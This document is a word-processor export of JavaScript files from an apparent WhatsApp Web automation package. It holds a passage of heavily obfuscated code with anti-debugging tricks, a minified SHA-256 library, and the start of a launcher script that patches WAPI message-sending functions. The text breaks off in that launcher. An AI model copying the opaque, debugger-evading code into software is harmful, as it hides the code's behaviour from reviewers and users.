_0x5f1c1b%_0x371a46;},'FikHl':function(_0x175999,_0x2075f4){return _0x175999!==_0x2075f4;},'cYjKF':'Mbo'+'nc','skIMC':_0x38331c(0x3d9,'OHp&amp;')+'Ye','bUxTz':function(_0x4b4562,_0x373dd2){return _0x4b4562+_0x373dd2;},'roszo':_0x38331c(0x480,'OHp&amp;')+'u','wyUzB':'gge'+'r','EXXcK':_0x38331c(0x50e,'5AE4')+'ion','xKwoD':function(_0x12a1f8,_0x21bcf0){return _0x12a1f8!==_0x21bcf0;},'TglWA':_0x38331c(0x4f4,'f*%b')+'BV','SBgCY':'UxH'+'qQ','hpyRy':function(_0x15ab04,_0x54ca97){return _0x15ab04+_0x54ca97;},'gMDTH':'sta'+_0x38331c(0x342,'Rtqj')+_0x38331c(0x3b2,'N9(d')+'ct','pZVJb':function(_0x5d05cd,_0x565b82){return _0x5d05cd(_0x565b82);}};function _0x42be71(_0x453dcb){const _0x4e29fb={'dUYeV':_0x115074[_0x56ff88('hJ6h',0x613)+'dY'],'xzSnj':_0x115074[_0x56ff88('NY1)',0x51a)+'CH'],'REgoA':function(_0x5c7618,_0x53b7b8){function _0x3a1351(_0x2af856,_0x126912){return _0x56ff88(_0x126912,_0x2af856- -0x472);}return _0x115074[_0x3a1351(0x96,'E]4x')+'Xx'](_0x5c7618,_0x53b7b8);},'UvuJI':_0x115074[_0x56ff88('U0Jr',0x5ab)+'zA'],'xCAtK':function(_0x14e8aa,_0x223623){function _0x225b11(_0x31730c,_0x4e0ae0){return _0x56ff88(_0x4e0ae0,_0x31730c- -0x34d);}return _0x115074[_0x225b11(0x17c,'y^Ni')+'zB'](_0x14e8aa,_0x223623);},'KIJio':_0x115074['Hlv'+'jQ'],'QxPgy':function(_0x31bec8,_0x51a1da){function _0x38ee61(_0x270b1d,_0x250dc4){return _0x56ff88(_0x250dc4,_0x270b1d-0x1e6);}return _0x115074[_0x38ee61(0x833,'kt3x')+'jY'](_0x31bec8,_0x51a1da);},'vJLnV':_0x115074['SiE'+'Js'],'tIzLT':function(_0xdcf701){return _0x115074['ICe'+'AI'](_0xdcf701);},'fZNtJ':function(_0x103e0a,_0x1953d8,_0x283b9e){function _0x1de658(_0x345e08,_0x5173c0){return _0x56ff88(_0x345e08,_0x5173c0- -0x223);}return _0x115074[_0x1de658('83Uv',0xf)+'Am'](_0x103e0a,_0x1953d8,_0x283b9e);},'dAcIF':_0x115074[_0x56ff88('Os%C',0x6c0)+'VN'],'uyzNy':function(_0x5d0a07,_0x598c5d){return _0x115074['Sgb'+'If'](_0x5d0a07,_0x598c5d);},'ztZjA':_0x115074[_0x56ff88('0bSR',0x6dc)+'fi'],'JuURH':_0x115074[_0x56ff88('0bSR',0x5e9)+'XB'],'kDIzc':function(_0x1a40a0,_0x228640){function _0x205af9(_0x5730ee,_0x262450){return _0x56ff88(_0x5730ee,_0x262450- -0x1ed);}return _0x115074[_0x205af9('hJ6h',0x19b)+'Xx'](_0x1a40a0,_0x228640);},'mvMiO':function(_0x2a56d4,_0x4bbd36){function _0x558dde(_0x3b700c,_0x6bfe31){return _0x56ff88(_0x3b700c,_0x6bfe31- -0x1f3);}return _0x115074[_0x558dde('y^Ni',0x300)+'sB'](_0x2a56d4,_0x4bbd36);},'ndpfH':_0x115074[_0x56ff88('htnj',0x1fd)+'PN'],'wbMke':function(_0x2bb8f3,_0xf715f1){function _0x1ad04b(_0x46156f,_0x45c05c){return _0x56ff88(_0x45c05c,_0x46156f- -0x3e8);}return _0x115074[_0x1ad04b(0xc,'vL&amp;G')+'Qs'](_0x2bb8f3,_0xf715f1);},'jGSyE':_0x115074[_0x56ff88('a0DP',0x45f)+'kH'],'aUxrQ':function(_0x25850c,_0x2f369c){function _0x49d4da(_0x53562e,_0x191635){return _0x56ff88(_0x53562e,_0x191635- -0x271);}return _0x115074[_0x49d4da('83Uv',0x2d9)+'Qs'](_0x25850c,_0x2f369c);},'psVHS':_0x115074[_0x56ff88('kt3x',0x56c)+'KP'],'czEsP':function(_0x480a91,_0xe45ef2){function _0xcee0b(_0x17ed7b,_0x2fd12c){return _0x56ff88(_0x2fd12c,_0x17ed7b-0x73);}return _0x115074[_0xcee0b(0x4a1,'NY1)')+'GF'](_0x480a91,_0xe45ef2);},'zzFzd':function(_0xe2baa6,_0x34c6f7){function _0x37d374(_0x2a5598,_0x4fbf76){return _0x56ff88(_0x2a5598,_0x4fbf76- -0x39d);}return _0x115074[_0x37d374('M6[c',0x95)+'Qs'](_0xe2baa6,_0x34c6f7);},'foEMV':function(_0x377564,_0x431587){return _0x115074['cVO'+'gn'](_0x377564,_0x431587);},'bTeZs':_0x115074[_0x56ff88('ddxB',0x2fc)+'Fd'],'IpIEW':function(_0x4accc7,_0x3bf582){function _0xd8a05d(_0x25b577,_0x16a835){return _0x56ff88(_0x16a835,_0x25b577- -0x2d0);}return _0x115074[_0xd8a05d(0x13,'U)fw')+'zB'](_0x4accc7,_0x3bf582);},'ssFnZ':function(_0x45be7d,_0x393ffe){function _0x1224a8(_0x519566,_0x4d7b22){return _0x56ff88(_0x4d7b22,_0x519566- -0x133);}return _0x115074[_0x1224a8(0x464,'N9(d')+'jY'](_0x45be7d,_0x393ffe);},'GNmLK':_0x115074[_0x56ff88('KR]L',0x299)+'GP'],'CmLLH':_0x115074[_0x56ff88('vL&amp;G',0x27b)+'iu'],'nASDz':function(_0x1b1875,_0xfe4a39){function _0x493e4f(_0x51277c,_0x975839){return _0x56ff88(_0x975839,_0x51277c- -0x28b);}return _0x115074[_0x493e4f(0x2f4,'kt3x')+'Xx'](_0x1b1875,_0xfe4a39);}};if(_0x115074[_0x56ff88('cSPR',0x358)+'yK'](typeof _0x453dcb,_0x115074[_0x56ff88('N4[D',0x609)+'kH'])){if(_0x115074[_0x56ff88('N9(d',0x29b)+'yK'](_0x115074[_0x56ff88('PWg1',0x547)+'TL'],_0x115074[_0x56ff88(')u7k',0x5ed)+'TL']))return function(_0x1bf220){}['con'+_0x56ff88('gze&amp;',0x398)+_0x56ff88('1%oo',0x40e)+'or'](_0x115074['sqV'+'rd'])[_0x56ff88('1%oo',0x616)+'ly'](_0x115074[_0x56ff88('PWg1',0x4d4)+'zt']);else{const _0x30b76c={'RcxOW':_0x4e29fb['dUY'+'eV'],'HqZJN':_0x4e29fb[_0x56ff88('sZpr',0x619)+'nj'],'ZnWEO':function(_0x30aacd,_0x332979){function _0x1f5c80(_0xfd7086,_0x2b0801){return _0x56ff88(_0xfd7086,_0x2b0801-0x1b7);}return _0x4e29fb[_0x1f5c80('7Z9M',0x601)+'oA'](_0x30aacd,_0x332979);},'iVQKE':_0x4e29fb[_0x56ff88('7Z9M',0x321)+'JI'],'locyP':function(_0xd141a0,_0x508aad){return _0x4e29fb['xCA'+'tK'](_0xd141a0,_0x508aad);},'XdZPj':_0x4e29fb[_0x56ff88('sZpr',0x496)+'io'],'denIJ':function(_0x3526ef,_0x239db0){function _0x1084b7(_0x4a18d6,_0x4c3859){return _0x56ff88(_0x4a18d6,_0x4c3859- -0x9b);}return _0x4e29fb[_0x1084b7('N4[D',0x2a7)+'gy'](_0x3526ef,_0x239db0);},'YGpWP':_0x4e29fb[_0x56ff88('%vt1',0x548)+'nV'],'pTzCU':function(_0x27d8c9){function _0x35c451(_0x150784,_0x2d1e25){return _0x56ff88(_0x2d1e25,_0x150784-0x69);}return _0x4e29fb[_0x35c451(0x328,'M6[c')+'LT'](_0x27d8c9);}};_0x4e29fb[_0x56ff88('a0DP',0x661)+'tJ'](_0x38922e,this,function(){function _0x3ff05d(_0x4ee9d8,_0x490435){return _0x56ff88(_0x490435,_0x4ee9d8-0x15f);}const _0x433e01=new _0x4ae5fe(_0x30b76c[_0x3ff05d(0x4e4,'dogi')+'OW']),_0x56962f=new _0x4ab0ac(_0x30b76c[_0x3ff05d(0x40e,'CG*O')+'JN'],'i'),_0x68bd5f=_0x30b76c[_0x3ff05d(0x534,'gze&amp;')+'EO'](_0x5891a,_0x30b76c[_0x3ff05d(0x3dc,'BxG7')+'KE']);!_0x433e01['tes'+'t'](_0x30b76c[_0x3ff05d(0x639,'1%oo')+'yP'](_0x68bd5f,_0x30b76c['XdZ'+'Pj']))||!_0x56962f[_0x3ff05d(0x62e,'$6*i')+'t'](_0x30b76c[_0x3ff05d(0x522,'Rtqj')+'IJ'](_0x68bd5f,_0x30b76c[_0x3ff05d(0x540,'N4[D')+'WP']))?_0x30b76c[_0x3ff05d(0x403,'leZ3')+'EO'](_0x68bd5f,'0'):_0x30b76c['pTz'+'CU'](_0x366957);})();}}else{if(_0x115074[_0x56ff88('jdCg',0x1f7)+'of'](_0x115074[_0x56ff88('BxG7',0x249)+'jY']('',_0x115074[_0x56ff88('BxG7',0x599)+'dq'](_0x453dcb,_0x453dcb))[_0x115074['UqC'+'LR']],-0x17b3*0x1+-0xd6*-0x1+-0x16de*-0x1)||_0x115074[_0x56ff88('I84y',0x6e7)+'eb'](_0x115074[_0x56ff88('y^Ni',0x610)+'lJ'](_0x453dcb,0x79e+-0x11e*0xe+-0x3d*-0x22),-0x1f*-0x3b+-0x4*0x907+0x1cf7)){if(_0x115074[_0x56ff88('lsS%',0x35c)+'Hl'](_0x115074['cYj'+'KF'],_0x115074[_0x56ff88('N4[D',0x1f9)+'MC']))(function(){function _0x184462(_0xafcd0,_0x154dac){return _0x56ff88(_0x154dac,_0xafcd0- -0xf3);}const _0x51f5d7={};_0x51f5d7['OkE'+'zU']=_0x4e29fb['dAc'+'IF'];const _0x32e459=_0x51f5d7;return _0x4e29fb[_0x184462(0x2b7,'gcm0')+'Ny'](_0x4e29fb['ztZ'+'jA'],_0x4e29fb[_0x184462(0x35a,'gze&amp;')+'RH'])?!![]:_0x10685f[_0x184462(0x581,'h$BM')+_0x184462(0x4d1,'$6*i')+'ng']()[_0x184462(0x464,'U)fw')+_0x184462(0x46b,'RRC%')](_0x32e459['OkE'+'zU'])[_0x184462(0x4cd,'sZpr')+_0x184462(0x24a,'iiKT')+'ng']()['con'+'str'+'uct'+'or'](_0x27411e)['sea'+'rch'](_0x32e459[_0x184462(0x2c8,'dogi')+'zU']);}[_0x56ff88('sZpr',0x681)+'str'+'uct'+'or'](_0x115074['bUx'+'Tz'](_0x115074[_0x56ff88('OHp&amp;',0x2a5)+'zo'],_0x115074[_0x56ff88('iiKT',0x37f)+'zB']))['cal'+'l'](_0x115074[_0x56ff88('4MFW',0x3d1)+'cK']));else{const _0x247aff=_0xa26f09?function(){if(_0x458590){const _0x408244=_0x3fa465['app'+'ly'](_0x161b1c,arguments);return _0x1e3388=null,_0x408244;}}:function(){};return _0x43ef44=![],_0x247aff;}}else{if(_0x115074[_0x56ff88('ddxB',0x61e)+'oD'](_0x115074[_0x56ff88('iiKT',0x645)+'WA'],_0x115074['SBg'+'CY']))(function(){function _0x432208(_0x23e3f,_0x1d30b9){return _0x56ff88(_0x23e3f,_0x1d30b9- -0x48c);}if(_0x115074[_0x432208('jdCg',-0x114)+'yK'](_0x115074[_0x432208('KR]L',-0xad)+'pk'],_0x115074[_0x432208('PWg1',-0x294)+'pk']))return![];else _0x4e29fb[_0x432208('hJ6h',-0x1ce)+'zc'](_0x4094f8,'0');}[_0x56ff88('lsS%',0x34e)+_0x56ff88('T0X#',0x534)+'uct'+'or'](_0x115074[_0x56ff88('4MFW',0x5f6)+'Ry'](_0x115074['ros'+'zo'],_0x115074[_0x56ff88('a0DP',0x355)+'zB']))[_0x56ff88('bnZi',0x49f)+'ly'](_0x115074['gMD'+'TH']));else return _0x579c98=[],_0x2532ca=_0x3f6dfd['key'+'s'](_0x410b58['mOb'+'j']),_0x2d93db['for'+_0x56ff88('Os%C',0x25c)+'h'](function(_0x3160ab){function _0x23ebf8(_0x279cad,_0x1d7a5c){return _0x56ff88(_0x1d7a5c,_0x279cad- -0x1de);}if(_0x17b1b2=_0x454aca[_0x23ebf8(0x278,'h$BM')+'j'][_0x3160ab],_0x4e29fb[_0x23ebf8(0x2ce,'$mkU')+'iO'](_0x4e29fb['ndp'+'fH'],typeof _0x1aac4b)){if(_0x4e29fb['wbM'+'ke'](_0x4e29fb['jGS'+'yE'],typeof _0x4c00f1)){if(_0x4e29fb[_0x23ebf8(0x108,'7Z9M')+'rQ'](_0x4e29fb[_0x23ebf8(0x4d0,'XpZ4')+'HS'],typeof _0x2a2a2e['def'+_0x23ebf8(0x248,'OHp&amp;')+'t'])){for(_0x424e28 in _0x20a644['def'+_0x23ebf8(0x18e,'y^Ni')+'t'])_0x4e29fb[_0x23ebf8(0x265,'lsS%')+'sP'](_0x16e14c,_0xe32154)&amp;&amp;_0x1ca2c5[_0x23ebf8(0x2a,'hJ6h')+'h'](_0x585ab5);}for(_0xa694e in _0x3e24c7)_0x4e29fb[_0x23ebf8(0xf9,'gze&amp;')+'zd'](_0x21f941,_0xfa2d0b)&amp;&amp;_0x9856ed[_0x23ebf8(0x429,'M6[c')+'h'](_0x1779d4);}else{if(_0x4e29fb['foE'+'MV'](_0x4e29fb[_0x23ebf8(0x6e,'1%oo')+'Zs'],typeof _0x3a6d2e))throw new _0x322a6d(_0x4e29fb['IpI'+'EW'](_0x4e29fb[_0x23ebf8(0x3d3,'vL&amp;G')+'nZ'](_0x4e29fb[_0x23ebf8(0x3ff,'0bSR')+'LK'],typeof _0x2c1175),_0x4e29fb[_0x23ebf8(0x133,'gcm0')+'LH']));_0x4e29fb[_0x23ebf8(0xdf,'NY1)')+'Dz'](_0xdafbec,_0x455f8e)&amp;&amp;_0x4a07ce[_0x23ebf8(0x3ce,'Rcey')+'h'](_0x1a7869);}}}),_0xc0a34;}}function _0x56ff88(_0x1bd3c4,_0x3c4ea5){return _0x38331c(_0x3c4ea5- -0x2,_0x1bd3c4);}_0x115074['eXz'+'Xx'](_0x42be71,++_0x453dcb);}function _0x38331c(_0x54fd09,_0x20724f){return _0x264f1c(_0x54fd09- -0x1df,_0x20724f);}try{if(_0x1dfa3b)return _0x42be71;else _0x115074['pZV'+'Jb'](_0x42be71,0x1*-0x26ad+0x17b9*0x1+-0x27e*-0x6);}catch(_0x2a42fb){}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/core/src/transport/assets/init_patch.js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packages/core/src/transport/assets/jsSha.min.js ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">'use strict';(function(I){function w(c,a,d){var l=0,b=[],g=0,f,n,k,e,h,q,y,p,m=!1,t=[],r=[],u,z=!1;d=d||{};f=d.encoding||"UTF8";u=d.numRounds||1;if(u!==parseInt(u,10)||1&gt;u)throw Error("numRounds must a integer &gt;= 1");if(0===c.lastIndexOf("SHA-",0))if(q=function(b,a){return A(b,a,c)},y=function(b,a,l,f){var g,e;if("SHA-224"===c||"SHA-256"===c)g=(a+65&gt;&gt;&gt;9&lt;&lt;4)+15,e=16;else throw Error("Unexpected error in SHA-2 implementation");for(;b.length&lt;=g;)b.push(0);b[a&gt;&gt;&gt;5]|=128&lt;&lt;24-a%32;a=a+l;b[g]=a&amp;4294967295;b[g-1]=a/4294967296|0;l=b.length;for(a=0;a&lt;l;a+=e)f=A(b.slice(a,a+e),f,c);if("SHA-224"===c)b=[f[0],f[1],f[2],f[3],f[4],f[5],f[6]];else if("SHA-256"===c)b=f;else throw Error("Unexpected error in SHA-2 implementation");return b},p=function(b){return b.slice()},"SHA-224"===c)h=512,e=224;else if("SHA-256"===c)h=512,e=256;else throw Error("Chosen SHA variant is not supported");else throw Error("Chosen SHA variant is not supported");k=B(a,f);n=x(c);this.setHMACKey=function(b,a,g){var e;if(!0===m)throw Error("HMAC key already set");if(!0===z)throw Error("Cannot set HMAC key after calling update");f=(g||{}).encoding||"UTF8";a=B(a,f)(b);b=a.binLen;a=a.value;e=h&gt;&gt;&gt;3;g=e/4-1;if(e&lt;b/8){for(a=y(a,b,0,x(c));a.length&lt;=g;)a.push(0);a[g]&amp;=4294967040}else if(e&gt;b/8){for(;a.length&lt;=g;)a.push(0);a[g]&amp;=4294967040}for(b=0;b&lt;=g;b+=1)t[b]=a[b]^909522486,r[b]=a[b]^1549556828;n=q(t,n);l=h;m=!0};this.update=function(a){var c,f,e,d=0,p=h&gt;&gt;&gt;5;c=k(a,b,g);a=c.binLen;f=c.value;c=a&gt;&gt;&gt;5;for(e=0;e&lt;c;e+=p)d+h&lt;=a&amp;&amp;(n=q(f.slice(e,e+p),n),d+=h);l+=d;b=f.slice(d&gt;&gt;&gt;5);g=a%h;z=!0};this.getHash=function(a,f){var d,h,k,q;if(!0===m)throw Error("Cannot call getHash after setting HMAC key");k=C(f);switch(a){case"HEX":d=function(a){return D(a,e,k)};break;case"B64":d=function(a){return E(a,e,k)};break;case"BYTES":d=function(a){return F(a,e)};break;case"ARRAYBUFFER":try{h=new ArrayBuffer(0)}catch(v){throw Error("ARRAYBUFFER not supported by this environment");}d=function(a){return G(a,e)};break;default:throw Error("format must be HEX, B64, BYTES, or ARRAYBUFFER");}q=y(b.slice(),g,l,p(n));for(h=1;h&lt;u;h+=1)q=y(q,e,0,x(c));return d(q)};this.getHMAC=function(a,f){var d,k,t,u;if(!1===m)throw Error("Cannot call getHMAC without first setting HMAC key");t=C(f);switch(a){case"HEX":d=function(a){return D(a,e,t)};break;case"B64":d=function(a){return E(a,e,t)};break;case"BYTES":d=function(a){return F(a,e)};break;case"ARRAYBUFFER":try{d=new ArrayBuffer(0)}catch(v){throw Error("ARRAYBUFFER not supported by this environment");}d=function(a){return G(a,e)};break;default:throw Error("outputFormat must be HEX, B64, BYTES, or ARRAYBUFFER");}k=y(b.slice(),g,l,p(n));u=q(r,x(c));u=y(k,e,h,u);return d(u)}}function m(){}function D(c,a,d){var l="";a/=8;var b,g;for(b=0;b&lt;a;b+=1)g=c[b&gt;&gt;&gt;2]&gt;&gt;&gt;8*(3+b%4*-1),l+="0123456789abcdef".charAt(g&gt;&gt;&gt;4&amp;15)+"0123456789abcdef".charAt(g&amp;15);return d.outputUpper?l.toUpperCase():l}function E(c,a,d){var l="",b=a/8,g,f,n;for(g=0;g&lt;b;g+=3)for(f=g+1&lt;b?c[g+1&gt;&gt;&gt;2]:0,n=g+2&lt;b?c[g+2&gt;&gt;&gt;2]:0,n=(c[g&gt;&gt;&gt;2]&gt;&gt;&gt;8*(3+g%4*-1)&amp;255)&lt;&lt;16|(f&gt;&gt;&gt;8*(3+(g+1)%4*-1)&amp;255)&lt;&lt;8|n&gt;&gt;&gt;8*(3+(g+2)%4*-1)&amp;255,f=0;4&gt;f;f+=1)8*g+6*f&lt;=a?l+="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(n&gt;&gt;&gt;6*(3-f)&amp;63):l+=d.b64Pad;return l}function F(c,a){var d="",l=a/8,b,g;for(b=0;b&lt;l;b+=1)g=c[b&gt;&gt;&gt;2]&gt;&gt;&gt;8*(3+b%4*-1)&amp;255,d+=String.fromCharCode(g);return d}function G(c,a){var d=a/8,l,b=new ArrayBuffer(d),g;g=new Uint8Array(b);for(l=0;l&lt;d;l+=1)g[l]=c[l&gt;&gt;&gt;2]&gt;&gt;&gt;8*(3+l%4*-1)&amp;255;return b}function C(c){var a={outputUpper:!1,b64Pad:"=",shakeLen:-1};c=c||{};a.outputUpper=c.outputUpper||!1;!0===c.hasOwnProperty("b64Pad")&amp;&amp;(a.b64Pad=c.b64Pad);if("boolean"!==typeof a.outputUpper)throw Error("Invalid outputUpper formatting option");if("string"!==typeof a.b64Pad)throw Error("Invalid b64Pad formatting option");return a}function B(c,a){var d;switch(a){case"UTF8":case"UTF16BE":case"UTF16LE":break;default:throw Error("encoding must be UTF8, UTF16BE, or UTF16LE");}switch(c){case"HEX":d=function(a,b,c){var f=a.length,d,k,e,h,q;if(0!==f%2)throw Error("String of HEX type must be in byte increments");b=b||[0];c=c||0;q=c&gt;&gt;&gt;3;for(d=0;d&lt;f;d+=2){k=parseInt(a.substr(d,2),16);if(isNaN(k))throw Error("String of HEX type contains invalid characters");h=(d&gt;&gt;&gt;1)+q;for(e=h&gt;&gt;&gt;2;b.length&lt;=e;)b.push(0);b[e]|=k&lt;&lt;8*(3+h%4*-1)}return{value:b,binLen:4*f+c}};break;case"TEXT":d=function(c,b,d){var f,n,k=0,e,h,q,m,p,r;b=b||[0];d=d||0;q=d&gt;&gt;&gt;3;if("UTF8"===a)for(r=3,e=0;e&lt;c.length;e+=1)for(f=c.charCodeAt(e),n=[],128&gt;f?n.push(f):2048&gt;f?(n.push(192|f&gt;&gt;&gt;6),n.push(128|f&amp;63)):55296&gt;f||57344&lt;=f?n.push(224|f&gt;&gt;&gt;12,128|f&gt;&gt;&gt;6&amp;63,128|f&amp;63):(e+=1,f=65536+((f&amp;1023)&lt;&lt;10|c.charCodeAt(e)&amp;1023),n.push(240|f&gt;&gt;&gt;18,128|f&gt;&gt;&gt;12&amp;63,128|f&gt;&gt;&gt;6&amp;63,128|f&amp;63)),h=0;h&lt;n.length;h+=1){p=k+q;for(m=p&gt;&gt;&gt;2;b.length&lt;=m;)b.push(0);b[m]|=n[h]&lt;&lt;8*(r+p%4*-1);k+=1}else if("UTF16BE"===a||"UTF16LE"===a)for(r=2,n="UTF16LE"===a&amp;&amp;!0||"UTF16LE"!==a&amp;&amp;!1,e=0;e&lt;c.length;e+=1){f=c.charCodeAt(e);!0===n&amp;&amp;(h=f&amp;255,f=h&lt;&lt;8|f&gt;&gt;&gt;8);p=k+q;for(m=p&gt;&gt;&gt;2;b.length&lt;=m;)b.push(0);b[m]|=f&lt;&lt;8*(r+p%4*-1);k+=2}return{value:b,binLen:8*k+d}};break;case"B64":d=function(a,b,c){var f=0,d,k,e,h,q,m,p;if(-1===a.search(/^[a-zA-Z0-9=+\/]+$/))throw Error("Invalid character in base-64 string");k=a.indexOf("=");a=a.replace(/\=/g,"");if(-1!==k&amp;&amp;k&lt;a.length)throw Error("Invalid '=' found in base-64 string");b=b||[0];c=c||0;m=c&gt;&gt;&gt;3;for(k=0;k&lt;a.length;k+=4){q=a.substr(k,4);for(e=h=0;e&lt;q.length;e+=1)d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".indexOf(q[e]),h|=d&lt;&lt;18-6*e;for(e=0;e&lt;q.length-1;e+=1){p=f+m;for(d=p&gt;&gt;&gt;2;b.length&lt;=d;)b.push(0);b[d]|=(h&gt;&gt;&gt;16-8*e&amp;255)&lt;&lt;8*(3+p%4*-1);f+=1}}return{value:b,binLen:8*f+c}};break;case"BYTES":d=function(a,b,c){var d,n,k,e,h;b=b||[0];c=c||0;k=c&gt;&gt;&gt;3;for(n=0;n&lt;a.length;n+=1)d=a.charCodeAt(n),h=n+k,e=h&gt;&gt;&gt;2,b.length&lt;=e&amp;&amp;b.push(0),b[e]|=d&lt;&lt;8*(3+h%4*-1);return{value:b,binLen:8*a.length+c}};break;case"ARRAYBUFFER":try{d=new ArrayBuffer(0)}catch(l){throw Error("ARRAYBUFFER not supported by this environment");}d=function(a,b,c){var d,n,k,e,h;b=b||[0];c=c||0;n=c&gt;&gt;&gt;3;h=new Uint8Array(a);for(d=0;d&lt;a.byteLength;d+=1)e=d+n,k=e&gt;&gt;&gt;2,b.length&lt;=k&amp;&amp;b.push(0),b[k]|=h[d]&lt;&lt;8*(3+e%4*-1);return{value:b,binLen:8*a.byteLength+c}};break;default:throw Error("format must be HEX, TEXT, B64, BYTES, or ARRAYBUFFER");}return d}function r(c,a){return c&gt;&gt;&gt;a|c&lt;&lt;32-a}function J(c,a,d){return c&amp;a^~c&amp;d}function K(c,a,d){return c&amp;a^c&amp;d^a&amp;d}function L(c){return r(c,2)^r(c,13)^r(c,22)}function M(c){return r(c,6)^r(c,11)^r(c,25)}function N(c){return r(c,7)^r(c,18)^c&gt;&gt;&gt;3}function O(c){return r(c,17)^r(c,19)^c&gt;&gt;&gt;10}function P(c,a){var d=(c&amp;65535)+(a&amp;65535);return((c&gt;&gt;&gt;16)+(a&gt;&gt;&gt;16)+(d&gt;&gt;&gt;16)&amp;65535)&lt;&lt;16|d&amp;65535}function Q(c,a,d,l){var b=(c&amp;65535)+(a&amp;65535)+(d&amp;65535)+(l&amp;65535);return((c&gt;&gt;&gt;16)+(a&gt;&gt;&gt;16)+(d&gt;&gt;&gt;16)+(l&gt;&gt;&gt;16)+(b&gt;&gt;&gt;16)&amp;65535)&lt;&lt;16|b&amp;65535}function R(c,a,d,l,b){var g=(c&amp;65535)+(a&amp;65535)+(d&amp;65535)+(l&amp;65535)+(b&amp;65535);return((c&gt;&gt;&gt;16)+(a&gt;&gt;&gt;16)+(d&gt;&gt;&gt;16)+(l&gt;&gt;&gt;16)+(b&gt;&gt;&gt;16)+(g&gt;&gt;&gt;16)&amp;65535)&lt;&lt;16|g&amp;65535}function x(c){var a=[],d;if(0===c.lastIndexOf("SHA-",0))switch(a=[3238371032,914150663,812702999,4144912697,4290775857,1750603025,1694076839,3204075428],d=[1779033703,3144134277,1013904242,2773480762,1359893119,2600822924,528734635,1541459225],c){case"SHA-224":break;case"SHA-256":a=d;break;case"SHA-384":a=[new m,new m,new m,new m,new m,new m,new m,new m];break;case"SHA-512":a=[new m,new m,new m,new m,new m,new m,new m,new m];break;default:throw Error("Unknown SHA variant");}else throw Error("No SHA variants supported");return a}function A(c,a,d){var l,b,g,f,n,k,e,h,m,r,p,w,t,x,u,z,A,B,C,D,E,F,v=[],G;if("SHA-224"===d||"SHA-256"===d)r=64,w=1,F=Number,t=P,x=Q,u=R,z=N,A=O,B=L,C=M,E=K,D=J,G=H;else throw Error("Unexpected error in SHA-2 implementation");d=a[0];l=a[1];b=a[2];g=a[3];f=a[4];n=a[5];k=a[6];e=a[7];for(p=0;p&lt;r;p+=1)16&gt;p?(m=p*w,h=c.length&lt;=m?0:c[m],m=c.length&lt;=m+1?0:c[m+1],v[p]=new F(h,m)):v[p]=x(A(v[p-2]),v[p-7],z(v[p-15]),v[p-16]),h=u(e,C(f),D(f,n,k),G[p],v[p]),m=t(B(d),E(d,l,b)),e=k,k=n,n=f,f=t(g,h),g=b,b=l,l=d,d=t(h,m);a[0]=t(d,a[0]);a[1]=t(l,a[1]);a[2]=t(b,a[2]);a[3]=t(g,a[3]);a[4]=t(f,a[4]);a[5]=t(n,a[5]);a[6]=t(k,a[6]);a[7]=t(e,a[7]);return a}var H;H=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298];"function"===typeof define&amp;&amp;define.amd?define(function(){return w}):"undefined"!==typeof exports?("undefined"!==typeof module&amp;&amp;module.exports&amp;&amp;(module.exports=w),exports=w):I.jsSHA=w})(this);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/core/src/transport/assets/jsSha.min.js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packages/core/src/transport/assets/launch.js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(async function() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if(WAPI.sendMessage.toString().includes('Not a contact') &amp;&amp; !WAPI.sendMessageToID) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            //evaluate the code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
